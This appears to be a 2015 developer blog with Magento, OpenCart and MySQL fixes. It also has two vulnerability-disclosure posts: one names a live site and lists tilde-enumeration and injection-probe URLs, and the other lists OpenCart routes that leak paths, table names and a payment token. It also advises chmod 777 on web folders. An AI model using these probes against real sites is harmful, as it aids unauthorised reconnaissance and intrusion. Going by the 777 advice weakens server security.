Tuesday, 28 April 2015

The easiest way to validate an email address in php and html

<?php if (filter_var('email@myemail.it', FILTER_VALIDATE_EMAIL) === false) { echo ' wrong email'; } ?>

In HTML, just set the input type to "email" and the browser will do the rest, unless you have particular needs.
The required attribute makes the input mandatory.
 

<input type="email" name="email" required>

Never rely on client-side validation alone; always repeat the check on the server.

[SOLUTION] opencart - taxes not applied for new customers group.

PROBLEM: Taxes not applied for new customers group.
SOLUTION: Opencart doesn't add the default taxation to new customer groups.
Just go to localization->Tax,
edit your default tax and check your customer groups.

Monday, 27 April 2015

Call to undefined method Mage_Core_Model_Config::cleanCache app/code/core/Mage/Core/Model/App.php on line 1088

If you have a very old version of magento and/or you have lost files or you've updated only the library this error can happen (as happened to me).


Add this code

    /**
    * Configuration cache clean process
    *
    * @return Mage_Core_Model_Config
    */
    public function cleanCache()
    {
        return $this->reinit();
    }
   
in app/code/core/Mage/Core/Model/Config.php.


after the function reinit() - around line 600 in magento 1.3.1



References
http://phpcrossref.com/xref/magento/app/code/core/Mage/Core/Model/Config.php.html#cleancache

Magento folders that must be writeable - magento files permissions - chmod magento folders.

Magento folders that must be writeable - chmod magento folders.

The folders/files that must be  writeable (chmod 777 with subfolders) in magento are:


/yourrootfolder/var/
used by magento for the cache, reports, logs

/yourrootfolder/media/
used by magento for the images

/yourrootfolder/app/etc/
ONLY for OLDER magento version prior to 1.4 to update use_cache.ser only (afaik).
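
A permission audit for the folders listed above, as an added example that is not part of the original post: it reports any world-writable path under a Magento root that falls outside those folders, and any listed folder that is missing. The function names and the temporary demo tree are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): audit world-writable paths
# under a Magento root against the folders the post lists.

# Usage: audit_magento_perms ROOT [EXTRA_ALLOWED_DIR ...]
# var/ and media/ are always allowed; pass app/etc for versions prior to 1.4.
audit_magento_perms() {
    root=${1%/}; shift
    set -- var media "$@"
    n=$#
    for dir in "$@"; do
        # A listed folder that does not exist is worth reporting too.
        [ -d "$root/$dir" ] || echo "MISSING $dir"
        # Append find predicates that exclude the folder and its contents.
        set -- "$@" ! -path "$root/$dir" ! -path "$root/$dir/*"
    done
    shift "$n"   # drop the folder names, keep only the find predicates

    # -perm -0002 matches anything with the "other: write" bit set;
    # symlinks are skipped because their own mode bits are not meaningful.
    find "$root" ! -type l -perm -0002 "$@" -print \
        | sed "s|^$root/|UNEXPECTED |" | sort
}

# Constructed demo tree: var/ and media/ are 777 as in the post, while
# app/code and a file inside it were made world-writable by mistake.
make_demo_tree() {
    demo=$(mktemp -d)
    mkdir -p "$demo/var/cache" "$demo/media" "$demo/app/code" "$demo/app/etc"
    touch "$demo/app/code/Core.php" "$demo/index.php"
    chmod 644 "$demo/index.php"
    chmod 755 "$demo/app" "$demo/app/etc"
    chmod -R 777 "$demo/var" "$demo/media" "$demo/app/code"
    echo "$demo"
}

demo_root=$(make_demo_tree)
audit_magento_perms "$demo_root"
rm -rf "$demo_root"
```
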





Fix c:\windows\system32\drivers\etc not resolving hosts to ip address.

Before starting, make sure that you have already correctly modified your
%SystemRoot%\System32\drivers\etc\hosts file

Verify that the path in your registry is pointing to the correct path

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\DataBasePath

The default value should be
%SystemRoot%\System32\drivers\etc

Check that you are resolving correctly by using the ping command; it will show the resolved IP address even if it is unable to ping.
Don't use nslookup since it seems to ignore the hosts file by default.


Run this command (theoretically useless ... but who knows) to flush the DNS resolver cache
ipconfig /flushdns
If you are using a browser remember to clear all your cache.

Verify that the hosts file has no extension, just "hosts".
Make sure that there are no special characters inside the file.


If it's a system issue run
sfc /scannow


Another possibility is to reset your hosts file with this microsoft fix
https://support.microsoft.com/it-it/kb/972034

 

Sunday, 26 April 2015

Get the ID of latest updated rows and automatically update latest modification timestamp

If you want to get the IDs of the rows updated by a query, you can do something like this

SET @updatedrows := null; /*we will store here the IDs*/
UPDATE mytable SET coltoupdate = 'mycontent' WHERE myID > 5 AND (SELECT @updatedrows := CONCAT_WS(', ', myID, @updatedrows));
SELECT @updatedrows; /*shows the updated IDs*/

If the rows have already been updated via other queries that you are not aware of, then, as far as I know, you must have a column (e.g. lastmodified) in the table that is updated each time you make modifications.

To update it *automatically* it's better to use triggers, if your MySQL version supports them. (https://dev.mysql.com/doc/refman/5.0/en/create-trigger.html )

/*adding the lastmodified col to the table*/
ALTER TABLE mytable ADD lastmodified DATETIME NOT NULL;

/*creating the trigger*/
CREATE TRIGGER updatelastmodified BEFORE UPDATE ON `mytable` FOR EACH ROW SET NEW.lastmodified = NOW();

After that you can select the most recently modified rows,
for example:

SELECT * FROM mytable ORDER BY lastmodified DESC LIMIT 5; /*for the latest 5 modified - you can also concat them as before and reuse in other queries*/

Saturday, 18 April 2015

How to replace the definer Clause from Dump File Before migration in sql file dump

 How to Remove Definer Clause from Dump File Before Migrating a MySQL Database


 If you have sed available (for Windows go to http://gnuwin32.sourceforge.net/packages/sed.htm) you can run
 sed -E 's/DEFINER=`[^`]+`@`[^`]+`/DEFINER=CURRENT_USER/g' yoursqlfile.sql > outputsqlfile.sql 

Otherwise you can use your preferred text editor, such as vim, notepad++ or emeditor (good for large files of several Terabytes), and do a regular-expression search/replace.

search string:
DEFINER=`[^`]+`@`[^`]+`

replace string:
DEFINER=CURRENT_USER

 You can also remove the definer (empty string) instead of using your current user.
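
The rewrite described above, as an added example that is not part of the original post: it lists the hard-coded definers in a dump, applies the same sed pattern, and confirms none are left. The function names and the sample dump are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): list, rewrite and re-check
# DEFINER clauses in a MySQL dump. The sample dump below is constructed.

# Same pattern as the sed command above; the backticks are literal.
DEFINER_RE='DEFINER=`[^`]+`@`[^`]+`'

# Distinct hard-coded definers with their occurrence counts.
list_definers() {
    grep -oE "$DEFINER_RE" "$1" | sort | uniq -c | sort -rn
}

# Number of hard-coded definers left in a file (0 after a clean rewrite).
count_definers() {
    grep -oE "$DEFINER_RE" "$1" | wc -l | tr -d ' '
}

# Rewrite every hard-coded definer to CURRENT_USER; result goes to stdout.
# "SQL SECURITY DEFINER" is left untouched, so the object then runs with
# the privileges of the account that imports the dump.
rewrite_definers() {
    sed -E "s/$DEFINER_RE/DEFINER=CURRENT_USER/g" "$1"
}

# Constructed sample in the style mysqldump uses for triggers, views, routines.
sample_dump() {
    cat <<'SQL'
/*!50003 CREATE*/ /*!50017 DEFINER=`root`@`localhost`*/ /*!50003 TRIGGER `updatelastmodified` BEFORE UPDATE ON `mytable` FOR EACH ROW SET NEW.lastmodified = NOW() */;
/*!50013 DEFINER=`appuser`@`%` SQL SECURITY DEFINER */
/*!50001 VIEW `recent` AS select `mytable`.`myID` AS `myID` from `mytable` */;
CREATE DEFINER=`root`@`localhost` PROCEDURE `p`() SELECT 1;
SQL
}

src=$(mktemp); dst=$(mktemp)
sample_dump > "$src"
echo "hard-coded definers before rewrite:"
list_definers "$src"
rewrite_definers "$src" > "$dst"
echo "hard-coded definers after rewrite: $(count_definers "$dst")"
rm -f "$src" "$dst"
```
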

Wednesday, 15 April 2015

fix - vqmod not working and no errors in the log files

How to fix vqmod for opencart not working and no errors in the log files.


If you have error files in /vqmod/logs/*.log you just need to fix the errors in your xml modifications in /vqmod/xml.

If you don't have any kind of modification and no errors:

make sure that you have the file
/vqmod/xml/vqmod_opencart.xml
If it's missing, download it for your version of vqmod (you can check the version in vqmod.php).

Replace all the local relative paths with absolute paths in your config.php and admin/config.php.



Make sure to delete all the .cache files in the /vqmod folder and the browser's cache.


That's all

Monday, 13 April 2015

Download FREE (legal) IT Disaster Recovery Planning for Dummies EBOOK

I got the free download offer of the ebook

http://sysadmingrp.tradepub.com/free/w_wile157/prgm.cgi

"IT Disaster Recovery Planning for Dummies (a $19.99 value) FREE Until 4/21" – With this eBook, you’ll be prepared for anything from hackers to hurricanes!

 ok - you can also download my (legal) copy from here

Sunday, 12 April 2015

Free up space in magento and manually delete magento cache.

SQL queries to clean most of the log and extra data that is not mandatory.
Don't use it if you need to debug problems or if you are exporting/importing data.
TRUNCATE dataflow_batch_export;
TRUNCATE dataflow_batch_import;
TRUNCATE log_customer;
TRUNCATE log_quote;
TRUNCATE log_summary;
TRUNCATE log_summary_type;
TRUNCATE log_url;
TRUNCATE log_url_info;
TRUNCATE log_visitor;
TRUNCATE log_visitor_info;
TRUNCATE log_visitor_online;
TRUNCATE report_viewed_product_index;
TRUNCATE report_compared_product_index;
TRUNCATE report_event;
TRUNCATE index_event;
TRUNCATE catalog_compare_item;

Note: Not all the tables are available on versions before version 1.8

You can freely delete the following in the web root folder

logs - var/log/*
cache - var/cache/*
reports - var/report/*
exports (your exported data!!!) - var/export/*
sessions (also your current sessions - if they are saved in those files) - var/session/*
temp files (usually the folder is empty) - var/tmp/*



Before doing anything, back up your data and make sure that you don't need the logs and other stuff.

magento - Fatal error: Call to a member function toHtml() on a non-object in app\code\core\Mage\Adminhtml\Block\System\Convert\Gui\Edit\Tabs.php on line 69

Solution
Check the integrity of this file
app\code\core\Mage\Adminhtml\Block\Catalog\Product\Helper\Form\Gallery.php
and of all the other files that may be missing.
Download a fresh copy of your own version of magento and replace any missing/corrupted files.

magento - fix Call to a member function addData() on a non-object wizardBlock->addData

Call to a member function addData() on a non-object wizardBlock->addData

solution:
check in app\code\core\Mage\Adminhtml\Block\System\Convert\Gui\Edit
whether the "Tab" folder or the "upload.php", "view.php", "wizard.php" files are missing or corrupted

If all the files are there, just back up the (edit) folder and replace the files with a fresh copy downloaded from the magento website.


Thursday, 9 April 2015

http://chiedoasilo.org/ | data leakage, xss, tilde directory enumeration, sql injection, system compromise


tilde directory enumeration
 http://chiedoasilo.org:80/*~1*/a.aspx?aspxerrorpath=/
C:\sitix\chiedoasilo\

http://chiedoasilo.org/templ_comunigazebo_det.asp?idlivello1=174&idlivello2=873&idlivello3=392&idril[test]=1
.... 

Tuesday, 7 April 2015

Opencart <= 2.0.1.3 data leakage, path disclosure, sql tables disclosure, secure token id disclosure, man in the middle proof of concept, sql injection

http://localhost/ocit/index.php?route=module/banner
you can see a simple Notice: Undefined index: banner_id


http://localhost/ocit/index.php?route=module/bestseller
you can see a simple  Notice: Undefined index: limit 


http://localhost/ocit/index.php?route=module/carousel
you can see a simple Notice: Undefined index: banner_id


http://localhost/ocit/index.php?route=module/featured
you can see a simple  Notice: Undefined index: limit


http://localhost/ocit/index.php?route=module/gallery (non stock extension/module)
you can see a simple Notice: Undefined index: filter_banner_id

http://localhost/ocit/index.php?route=module/news (non stock extension/module)
Notice: Error: Table 'test.oc_news' doesn't exist
Error No: 1146
SELECT * FROM oc_news n LEFT JOIN oc_news_description nd ON n.news_id = nd.news_id WHERE nd.language_id = '2' AND n.status = '1' ORDER BY date_added DESC LIMIT 0,5 in system\library\db\mysqli.php on line 41 
Notice: Trying to get property of non-object in catalog\model\extension\news.php on line 26
Warning: Invalid argument supplied for foreach() in catalog\controller\module\news.php on line 19


http://localhost/ocit/index.php?route=module/slideshow
you can see a simple Notice: Undefined index: banner_id 

http://localhost/ocit/index.php?route=module/special
Notice: Undefined index: limit in catalog\controller\module\special.php on line 24
Notice: Undefined index: width in catalog\controller\module\special.php on line 32
Notice: Undefined index: height in catalog\controller\module\special.php on line 32
Warning: imagecreatetruecolor(): Invalid image dimensions in system\library\image.php on line 86
Warning: imagecolorallocate() expects parameter 1 to be resource, boolean given in system\library\image.php on line 94
Warning: imagefilledrectangle() expects parameter 1 to be resource, boolean given in system\library\image.php on line 97
Warning: imagecopyresampled() expects parameter 1 to be resource, boolean given in system\library\image.php on line 99
Notice: Undefined index: width in catalog\controller\module\special.php on line 32
Notice: Undefined index: height in catalog\controller\module\special.php on line 32
Warning: imagecreatetruecolor(): Invalid image dimensions in system\library\image.php on line 86
Warning: imagecolorallocate() expects parameter 1 to be resource, boolean given in system\library\image.php on line 94
Warning: imagefilledrectangle() expects parameter 1 to be resource, boolean given in system\library\image.php on line 97
Warning: imagecopyresampled() expects parameter 1 to be resource, boolean given in system\library\image.php on line 99


http://localhost/ocit/index.php?route=payment/authorizenet_sim
Notice: Undefined index: order_id in catalog\controller\payment\authorizenet_sim.php on line 10
Notice: Undefined index: order_id in catalog\controller\payment\authorizenet_sim.php on line 13
Notice: Undefined index: order_id in catalog\controller\payment\authorizenet_sim.php on line 21


http://localhost/ocit/index.php?route=payment/bluepay_hosted
Fatal error: Class 'Controllerpaymentbluepayhosted' not found

http://localhost/ocit/index.php?route=payment/firstdata
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/globalpay
Notice: Undefined index: order_id


http://localhost/ocit/index.php?route=payment/klarna_account
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/klarna_invoice
Notice: Undefined index: order_id
 
http://localhost/ocit/index.php?route=payment/liqpay
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/nochex
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/paymate
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/paypoint
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/payza
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/pp_payflow
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/pp_payflow_iframe
Notice: Undefined index: order_id in catalog\controller\payment\pp_payflow_iframe.php on line 9
Notice: Undefined index: order_id in catalog\controller\payment\pp_payflow_iframe.php on line 25
INSERT INTO `oc_paypal_payflow_iframe_order` SET `order_id` = '0', `secure_token_id` = 'f61192e89c716049bb146a7a91b2acfe' in system\library\db\mysqli.php on line 41
Notice: Undefined index: code in catalog\controller\payment\pp_payflow_iframe.php on line 46
Notice: Undefined index: iso_code_2 in catalog\controller\payment\pp_payflow_iframe.php on line 48

http://localhost/ocit/index.php?route=payment/pp_standard
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/realex
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/realex_remote
Warning: Invalid argument supplied for foreach() in catalog\controller\payment\realex_remote.php on line 32
 
http://localhost/ocit/index.php?route=payment/securetrading_pp
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/securetrading_ws
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/skrill
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/twocheckout
Notice: Undefined index: order_id

More info will be available later...
